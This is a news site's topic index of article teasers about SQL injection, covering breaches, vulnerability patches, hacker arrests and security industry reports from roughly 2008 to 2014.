Feeds

Articles about Sql Injection

bug on keyboard

Joomla issues upgrade to patch critical SQL vuln

Joomla's developers have moved to fix a critical SQL injection vulnerability – but are coming under fire for taking a month to address the issue. The version 3.2.3 update, available since late last week, is described by Joomla as fixing a high priority core SQL injection bug (along with two medium priority XSS bugs and an …
The Register breaking news

Ruby on Rails has SQL injection vuln

The maintainers of Ruby on Rails are warning of an SQL injection vulnerability which affects all versions of the popular Web framework. They advise that users should immediately apply an upgrade available here. Designated CVE-2012-5664, the maintainers explain the bug this way: “Due to the way dynamic finders in Active Record …
The Register breaking news

PayPal plugs SQL injection hole, tosses $3k to bug-hunter

PayPal has fixed a security bug that could have allowed hackers to compromise the payment website's databases using an SQL injection attack. Researchers at Vulnerability Laboratory earned a $3,000 reward for discovering and reporting the critical bug to PayPal in August. An advisory sent to the Full Disclosure security mailing …
John Leyden, 30 Jan 2013
The Register breaking news

E-shopkeepers stabbed with SQL needles 'twice' as much as other sites

Retailers suffer twice as many SQL injection attacks on their systems as other industries, according to a new study by data-centre security firm Imperva, which claims the ferocity of web-based assaults is growing. The fourth annual edition of Imperva's Web Application Attack Report [PDF] also revealed that e-shopping …
John Leyden, 23 Jul 2013
The Register breaking news

MySQL.com hacked via... SQL injection vuln

MySQL.com was hacked over the weekend via an attack which used a blind SQL injection exploit to pull off the pawnage. Hackers extracted usernames and password hashes from the site, which were subsequently posted to pastebin.com. Any easy to guess login credentials could be easily extracted from this data using rainbow tables to …
John Leyden, 28 Mar 2011

Bogus Firefox add-on FORCES WITLESS USERS to join vuln-hunting party

Cybercrooks have brewed up a botnet that uses a bogus Firefox add-on to scan the web for hackable websites. The so-called Advanced Power botnet runs SQL injection attacks on websites visited from infected machines. The malware, disguised as a legitimate add-on for Mozilla Firefox, found its way onto 12,500 systems, reports …
John Leyden, 17 Dec 2013
The Register breaking news

LizaMoon mass-injection attack reaches epidemic proportions

Malware writers are using website vulnerabilities to inject malicious scripts into thousands of websites as part of an ambitious attack ultimately designed to redirect surfers to a site pimping rogue anti-virus packages. The so-called LizaMoon mass-injection attack uses SQL injection trickery to inject a line of malicious code …
John Leyden, 31 Mar 2011
Hacker baseball cap

Laurie Love investigation stretches to Australia, Sweden

Following the arrest of Laurie Love of Suffolk on charges that he gained unauthorised access to US government computers, it's emerged that he was working with co-conspirators in Australia and Sweden. According to the charges reported here yesterday, Love's twelve-month hacking spree included machines belonging to the US Army, …
The Register breaking news

No secret to stopping XSS and SQL injection attacks

SQL injection attacks and cross-site scripting exploits just won't die. The most recent and high-profile incident was a mass webpage attack on more than 100,000 pages, which included victims as diverse as The Wall Street Journal, TomTom, and the UK's Strathclyde police. There was a teetering stack of exploits involved in this …
Matt Stephens, 23 Jun 2010
Flag China

Mass SQL injection hits English language websites

Thousands of websites in China have been booby trapped with code written to download Trojan software onto visitors who run vulnerable Windows PCs. Unlike earlier rounds of SQL injection attacks the latest assaults mostly target English language sites (predominantly sites hosted in China but with a .com suffix) and purposefully …
John Leyden, 21 May 2008
The Register breaking news

Next-gen SQL injection opens server door

A vulnerability estimated to affect more than 1 in 10 websites could go lethal with the finding that it can be used to reliably take complete control of the site's underlying server. Research to be presented at the Black Hat security conference in Amsterdam later this month will show how so-called SQL injection attacks open the …
Dan Goodin, 02 Apr 2009
The Register breaking news

Energy sector under increasing attack: DHS

The Department of Homeland Security, via its ICS-CERT group, is reporting growing attacks against critical infrastructure with the energy sector leading the way. Its most recent ICS-CERT Monitor report states that of more than 200 incidents it investigated between October 2012 and May 2013, 53 percent were in the energy sector. …
The Register breaking news

SQL injection taints BusinessWeek.com

Add BusinessWeek.com to the list of big-name sites felled by the mighty SQL injection attack. According to Sophos, the business news site has been infected with attack code that since sometime last week has been trying to install malware on the machines of those who visit the site. The attack affected hundreds of BusinessWeek. …
Dan Goodin, 16 Sep 2008
The Register breaking news

Under the microscope: The bug that caught PayPal with its pants down

Security researchers have published a more complete rundown of a recently patched SQL injection flaw on PayPal's website. The Vulnerability Laboratory research team received a $3,000 reward after discovering a remote SQL injection web vulnerability in the official PayPal GP+ Web Application Service. The critical flaw, which …
John Leyden, 15 Apr 2013
FBI badge and gun

UK man Lauri Love accused of hacking US Federal Reserve

The US government have laid more hacking charges against a Brit alleged to have hacked into the US Federal Reserve. Lauri Love, 28, of Stradishall, Suffolk, is charged with one count of computer hacking and a further charge of aggravated identify theft over an alleged attack on Federal Reserve computer systems between October …
John Leyden, 28 Feb 2014
HP

Microsoft and HP tackle SQL-injection scourge

With successful attacks against websites reaching epidemic levels, Microsoft and HP have released a free set of tools that help developers check their web applications for the mistakes that leave them open to exploits that can steal sensitive information and harm visitors. The tools are designed to scan websites for …
Dan Goodin, 26 Jun 2008

It may be ILLEGAL to run Heartbleed health checks – IT lawyer

Websites and tools that have sprung up to check whether servers are vulnerable to OpenSSL's mega-vulnerability Heartbleed have thrown up anomalies in computer crime law on both sides of the Atlantic. Both the US Computer Fraud and Abuse Act and its UK equivalent the Computer Misuse Act make it an offence to test the security of …
John Leyden, 11 Apr 2014
The Register breaking news

American Fantasy Football app lets hackers change team rosters

Security researchers have discovery a vulnerability in mobile versions of the Yahoo! Fantasy [American] Football app that created a means for hackers to change team lineups and post imposter comments on message boards. Yahoo! has plugged the security hole, but users who fail to update their mobile app to the most recent version …
John Leyden, 06 Sep 2013
The Register breaking news

Signatures no good at protecting databases, says Juniper

One of the most common forms of attack is the SQL injection, and although the vector is ancient and well-understood, it's notoriously difficult to defend against. Kevin Kennedy, senior director of product management for Juniper Networks' security business unit, is in Australia to demonstrate Juniper's latest shot at defeating …
The Register breaking news

Symantec slams Web Gateway back door on would-be corporate spies

Symantec has plugged a series of critical flaws in its Web Gateway appliances which included a backdoor permitting remote code execution on targeted systems. The flaws, discovered during a short crash test by security researchers at Austrian firm SEC Consult, created a means to execute code with root privileges - or the ability …
John Leyden, 29 Jul 2013
The Register breaking news

They didn't predict that: Astrologers! blamed! after! Yahoo! hack!

Weaknesses in cloud security and third-party code allowed a hacker to compromise Yahoo! systems last month, according to an analysis of the purported breach. In December, an Egyptian nicknamed ViruS_HimA claimed he cracked the web giant's security systems, acquired full access to 12 databases and broke into an unspecified server …
John Leyden, 29 Jan 2013
The Register breaking news

Microsoft rejects call to fix SQL password-exposure risk

Microsoft is butting heads with a company that provides software for database security over a weakness in SQL Server that can expose user passwords to anyone with administrative access to the program. Researchers at San Mateo, California-based Sentrigo warned Wednesday that the "significant vulnerability" is present in the 2000 …
Dan Goodin, 02 Sep 2009

Ex-Google, Mozilla bods to outwit EVIL BOTS with 'polymorphic' defence

Startup Shape Security is re-appropriating a favourite tactic of malware writers in developing a technology to protect websites against automated hacking attacks. Trojan authors commonly obfuscate their code to frustrate reverse engineers at security firms. The former staffers from Google, VMWare and Mozilla (among others) have …
John Leyden, 21 Jan 2014
The Register breaking news

Symantec dismisses blind SQL hack claims

Symantec's website has been given the once-over by the same Romanian hacking group that exposed security problems with websites run by Kaspersky Lab, F-Secure and Bitdefender earlier this month. The hacker, Uno, claims that the document download centre section on Symantec's European site is vulnerable to a blind SQL Injection …
John Leyden, 20 Feb 2009

FBI sends memo to US.gov sysadmins: You've been hacked... for the past YEAR

Hacktivists allegedly affiliated with Anonymous have been covertly breaking into US government systems and pilfering sensitive information for nearly a year, the FBI warned last week. The attacks (which began last December and are thought to be ongoing) exploit flaws in Adobe's ColdFusion web app development software to plant …
John Leyden, 18 Nov 2013
The Register breaking news

SAP users slack, slow and backward on security

Cross-site scripting, failure to check credentials, directory traversal and SQL injection make up more than three-quarters of vulnerabilities in SAP environments, according to a presentation by ERPScan's Alexander Polyakov to RSAConference Asia Pacific 2013. And the vulnerable state of the SAP world is increasingly attracting …
anonymousCARTOON

Second LulzSec Sony website hacker starts a year in the cooler

A LulzSec hacker has been sentenced to a year in a US jail for hacking Sony Pictures and dumping personal information of 138,000 movie fans online. Raynaldo Rivera, 21, of Tempe, Arizona, will spend 366 days behind bars, followed by 13 months of house arrest and 1,000 hours of community service for his involvement in the …
John Leyden, 09 Aug 2013
Zombies, credit: Wikimedia from Night of The Living Dead

Zombie PCs are for crimelord chumps: Fear clusters, says infosec ace

It may be possible for a "single dedicated attacker" to run an internet "carpet-bombing" attack by applying Big Data and distributed computing technologies, security researcher Alejandro Caceres warns. The traditional botnet, or network of hijacked computers, has been used for distributed computing problems, such as Bitcoin …
John Leyden, 14 Aug 2013

Obamacare website 'either hacked or will be soon', warns infosec expert

Hackers have thrown multiple attacks at US President Obama's medical insurance bazaar HealthCare.gov since it went live in October, according to a senior US government official. Acting assistant Homeland Security secretary Roberta Stempfley told a hearing of the House Homeland Security (HHS) Committee that the website was …
John Leyden, 19 Nov 2013
The Register breaking news

Yahoo! hack! leaks! 453,000! unencrypted passwords!

A Yahoo! service has apparently succumbed to a simple database attack that leaked 453,000 unencrypted account passwords online. A huge document containing the lifted SQL structures, software variables, usernames and cleartext passwords was linked to from a web forum. In the file, the hackers described the break-in as "a wake-up …
John Leyden, 12 Jul 2012
The Register breaking news

CISPA row: Slurped citizen data is ENORMO HACK TARGET - infosec boss

The ability to identify common patterns in real-world attacks makes crowd-sourcing threat intelligence extremely useful, according to a study from security tools firm Imperva. The report arrives just as a privacy row rages over the new Cyber Intelligence Sharing and Protection Act (CISPA) law in the US. But the head of the …
John Leyden, 23 Apr 2013
The Register breaking news

1 MILLION accounts leaked in megahack on banks, websites

Hacker collective Team GhostShell leaked a cache of more than one million user account records from 100 websites over the weekend. The group, which is affiliated with hacktivists Anonymous, claimed they broke into databases maintained by banks, US government agencies and consultancy firms to leak passwords and documents. Some of …
John Leyden, 28 Aug 2012
The Register breaking news

Hackers leak 120,000 student records in raid on world's top unis

Hackers have attacked the world's top 100 universities in a protest against tuition fees and what's deemed to be a falling quality of education. Anonymous-affiliated Team GhostShell dumped information from 120,000 user accounts and student records after raiding servers at institutions including Princeton, Harvard, Cambridge and …
John Leyden, 02 Oct 2012
The Sun, hacked to redirect to LulzSec Twitter page

Australian Federal Police claim arrest of 'LulzSec leader'

The Australian Federal Police (AFP) has arrested a man described "a self-proclaimed leader of the group ‘Lulz Security’ (Lulzsec), a computer hacking group that has existed since 2011." The as-yet-unnamed 24-year-old man was apprehended in the coastal town of Point Clare was arrested after using a known exploit to last month …
The Register breaking news

Hackers now pick tools from script kiddies' toybox – report

Hackers are increasingly turning to automated software tools to launch attacks. According to research from Imperva, more than 60 per cent of SQL injection attacks and as many as 70 per cent of Remote File Inclusion attacks (the two most common attack types) are automated. Remote File Inclusion attacks allows hackers to plant …
John Leyden, 24 Apr 2012
The Register breaking news

'World's BIGGEST online fraud': Suspect's phone had 'location' switched on

Two Russians arrested over their suspected involvement in the largest online fraud in US history were tracked down by analysing photos they posted to social media sites and tracking the location of one suspect's mobile phone, Reuters reports. Four Russians and a Ukrainian national were named as suspects in a credit card hacking …
John Leyden, 29 Jul 2013

IRS boss on XP migration: 'Classic fix the airplane while you're flying it attempt'

That whole Heartbleed bug thing just kept running on and on this week, first with accusations that the National Security Agency had defied its brief by knowing about the security breach and doing stuff-all about it. The Heartbleed flaw, which was revealed last week, allows attackers to access passwords, crypto-keys and other …
The Register breaking news

Security still slack in WA government agencies

While not as utterly hopeless as last year, IT security is still troublesome in Western Australia’s government agencies. In last year’s annual audit, the Auditor General strolled through fourteen agency networks in an undetected penetration test. This year, the auditor’s staff have looked at payment security in nine agencies, as …
The Register breaking news

Second LulzSec member pleads guilty to Sony hack

A second suspect has admitted involvement in high profile attack last year against Sony Pictures website by notorious hacking crew LulzSec. Passwords and personal information leaked as a result of the breach in May 2011. The site was breached using an SQL injection attack, a common hacking technique, to extract personal …
John Leyden, 15 Oct 2012
The Register breaking news

WHMCS under renewed DDoS blitz after patching systems

WHMCS, the UK-based billing and customer support tech supplier, has once again come under denial of service attacks, on this occasion following an upgrade of its systems to defend against a SQL injection vulnerability. The security patch was applied on Tuesday following reports by KrebsOnSecurity that a hacker was auctioning …
John Leyden, 01 Jun 2012
The Register breaking news

Ruby off the Rails: Enormo security hole puts 240k sites at risk

Popular programming framework Ruby on Rails has two critical security vulnerabilities - one allowing anyone to execute commands on the servers running affected web apps. The newly uncovered bugs both involve the parsing and handling of data supplied by visitors to a Rails application. The CVE-2013-0156 hole is the more severe of …
John Leyden, 10 Jan 2013
The Register breaking news

SQL attacks inject government sites in US, UK

A new round of SQL injection attacks has infected millions of web pages belonging to businesses and government agencies, including those that belong to the National Institutes of Health and Education Department in the US and the UK Trade & Investment. This search shows at least 1.45 million infected pages and queries here and …
Dan Goodin, 07 Aug 2008
The Register breaking news

LinkedIn faces class action suit over password leak

LinkedIn is facing a class action suit over the security breach that saw millions of users' passwords posted online. Illinois resident Katie Szpyrka leads the complaint, which alleges that LinkedIn failed to "properly safeguard its users' personally identifiable information". The complaint filed in California accuses the …
The Register breaking news

Black hat greed reducing software vulnerability report rate

HP has kicked off the round of reports that accompany each RSA conference with its analysis of security vulnerabilities, and has revealed that although the overall trend is positive, the growing market for zero-day flaws is reducing the number of the most serious problems that are disclosed. software vulnerabilities The long- …
Iain Thomson, 26 Feb 2013
The Register breaking news

Romanian cops cuff suspected serial hacker TinKode

Romanian police have arrested a man suspected of breaking into the websites of NASA and the Pentagon in a series of high-profile hack attacks. Razvan Manole Cernaianu, 20, from Timisoara, is accused of publishing details of the SQL injection vulnerabilities discovered on the targeted websites under the hacker handle TinKode. The …
John Leyden, 01 Feb 2012
The Register breaking news

Patchy app development security slammed

Eight in 10 applications failed to pass stricter security testing standards in test by application security assessment firm Veracode. Veracode tightened up its testing procedures so that apps prone to cross-site scripting and SQL injection errors automatically failed. This zero tolerance policy reflects that fact that these two …
John Leyden, 08 Dec 2011
For Sale sign detail

Daily Telegraph hit by SQL hack attack

Vulnerabilities on a Daily Telegraph website have been exposed by serial grey-hat hacker Unu. In a posting on the hackersblog site Unu outlines a number of SQL injection security weaknesses on the newspaper's website. The entry, which includes screenshots to substantiate the claim, claims that subscriber email addresses were …
John Leyden, 09 Mar 2009
The Register breaking news

Tipsters exposed after South Africa's national police force hacked

The identities of more than 15,000 South Africans who reported crimes or provided tip-offs to the police have been exposed following an attack on a SAPS (South African Police Service) website. The names and personal details of whistleblowers and crime victims were lifted from www.saps.gov.za and uploaded to a bullet-proof …
John Leyden, 23 May 2013
The Register breaking news

Second LulzSec suspect charged over Sony Pictures hack

US police have arrested a second suspect in the June 2011 hacktivist attacks on Sony Pictures Entertainment, an assault that resulted in a breach of passwords and personal data involving 38,000 accounts. Raynaldo Rivera, 20, of Tempe, Arizona, surrendered to authorities on Tuesday after he was named in a federal grand jury …
John Leyden, 29 Aug 2012
An alternative Yahoo! logo, courtesy of a Flickr user

Yahoo! fixes! password! leak! vulnerability!

Yahoo! has fixed the flaw that allowed hackers to scrape the unencrypted passwords of over 450,000 of its customers' accounts. "We have taken swift action and have now fixed this vulnerability, deployed additional security measures for affected Yahoo! users, enhanced our underlying security controls and are in the process of …
Iain Thomson, 13 Jul 2012